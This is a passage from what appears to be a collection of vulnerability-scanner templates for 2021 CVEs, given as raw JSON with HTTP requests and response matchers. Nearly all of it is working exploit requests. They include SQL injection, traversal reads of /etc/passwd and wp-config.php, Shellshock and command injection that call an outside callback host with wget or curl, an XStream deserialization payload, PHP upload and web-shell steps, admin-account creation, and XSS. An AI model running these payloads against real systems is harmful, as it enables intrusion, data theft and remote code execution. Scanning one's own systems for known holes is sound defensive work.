application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\n","GET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1","contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')"],"condition":"and"}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42627","info":{"name":"D-Link DIR-615 - Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wan.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");","var ipv6conntype"],"condition":"and"},{"type":"word","part":"header","words":["Virtual Web"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-28918","info":{"name":"Netmask NPM Package - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://0177.0.0.1/server-status","{{BaseURL}}/?host=http://0177.0.0.1/server-status","{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Apache Server Status","Server Version"],"condition":"and"},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent 